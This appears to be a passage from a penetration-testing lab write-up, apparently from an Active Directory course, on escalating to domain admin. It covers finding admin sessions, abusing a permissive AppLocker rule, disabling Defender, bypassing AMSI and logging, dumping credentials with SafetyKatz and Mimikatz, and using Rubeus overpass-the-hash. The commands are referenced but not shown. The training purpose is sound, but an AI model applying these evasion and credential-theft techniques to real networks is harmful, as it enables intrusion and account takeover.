🪜Domain admin session in target domain -> escalate privileges
We are going to start by using Find-DomainUserLocation on the reverse shell we got earlier as ciadmin to looks for machines where a domain admin is logged in.
So we start by hosting our web server using wsl to bypass Enhanced Script Block Logging. Unfortunately, we have no in-memory bypass for PowerShell transcripts. Note that we could also paste the contents of sbloggingbypass.txt in place of the download-exec cradle.
Then we use the below command to bypass AMSI:
Then we had a tip from a guy on discord to host a web server using WSL rather than hfs.exe ->
We then download power View on the target machine and launch the following command: Find-DomainUserLocation on the reverse shell to looks for machines where a domain admin is logged in.
We can see that there is a domain admin session on dcorp-mgmt server!
This means in the network we're going to go through this path:
The user
svcadmin
is logged into the serverdcorp-mgmt.dollarcorp.moneycorp.local
.This user has domain admin privileges, which means they have high-level administrative access to the domain
dcorp
Abuse with Winrs
Now, we have to check if we can execute commands on dcorp-mgmt server and if the winrm port is open:
winrs
(Windows Remote Shell) is a command-line tool that allows you to execute commands on remote Windows machines. It is similar to SSH for Windows systems.
So we see that we can execute code on the dcorp-mgmt machine:
First we need to copy the Loader.exe to dcorp-mgmt:
First we copy it to our reverse shell then we load it on the target machine ->
We need to avoid detection on dcorp-mgmt
by setting up port forwarding. This will allow traffic to be redirected from one port to another, effectively masking the original connection.
Then i wanted to run SafetyKatz
And unexpectedly it worked without any problems ->
Now with these credentials, we are going to go and perform Over pass the hash and use svcadmin's creds. On the student VM we're going to run an elevated shell and try to bypass potential detection:
And now we run the Rubeus command with %Pwn% as asktgt command
We can see that %Pwn% was interpreted as asktgt, we succesfully got our TGT and it poped a shell (on the right) and we were able to execute code on domain controller
Process of this attack:
We load Loader.exe to dcorp-mgmt via our jenkins shell (dcorp-ci)
After port forwarding we use SafetyKatz to get svcadmin credentials
We use Rubeus to perform over pass the hash to forge a TGT
We succesfully forge the ticket and we can access the domain controller
For the next task, we need to escalate to domain admin using derivative local admin. Let’s find out the machines on which we have local admin privileges. On a PowerShell session started using Invisi-Shell, enter the following command.
After running the following command,
We see that we have local admin on the dcorp-adminsrv. You will notice that any attempt to run Loader.exe (to run SafetKatz from memory) results in error 'This program is blocked by group policy.'
This could be because of an application allolist on dcorp-adminsrv and we drop into a Constrained Language Mode (CLM) when using PSRemoting.
Let's check if Applocker is configured on dcorp-adminsrv by querying registry keys.
Looks like Applocker is configured. After going through the policies, we can understand that Microsoft Signed binaries and scripts are allowed for all the users but nothing else. However, this particular rule is overly permissive!
So everyone can run scripts from the C:\ProgramFiles folder
We could've checked that with the following command:
Before abusing this, we need to disable Windows defender:
we cannot run scripts using dot sourcing (. .\Invoke-Mimi.ps1) because of the Constrained Language Mode. So, we must modify Invoke-Mimi.ps1 to include the function call in the script itself and transfer the modified script (Invoke-MimiEx.ps1) to the target server.
To bypass this we would to:
Create a copy of Invoke-Mimi.ps1 and rename it to Invoke-MimiEx.ps1.
Open Invoke-MimiEx.ps1 in PowerShell ISE (Right click on it and click Edit).
Add "Invoke-Mimi -Command '"sekurlsa::ekeys"' " (without quotes) to the end of the file
Now from our student VM we transfer our file:
Here we see that the command was succesful:
So we just have to run the file and collect our hashes:
So now we can ask for a tgt with rubeus, on local machine open a elevated cmd and set those values to bypass defender:
Now we ask for a tgt with the new hashes we got:
Then a shell will spawn with srvadmin privileges, we just have to check if srvadmin has admin privileges on any other machine:
So we can see we have local admin on dcorp-mgmt and dcorp-adminsrv
We now need to transfer Loader.exe and Safty.bat
We now need to run Invoke-mimi on dcorp-mgmt
We start by getting our shell then bypass AMSI to download the ps1 script:
And after that we can use Invoke-Mimi
Invoke-Mimi for extracting credentials from credentials vault
We can also look for credentials from the credentials vault. Interesting credentials like those used for scheduled tasks are stored in the credential vault.
And finaly we can use the hash we found on the Student VM to perform Over Pass the hash
Last updated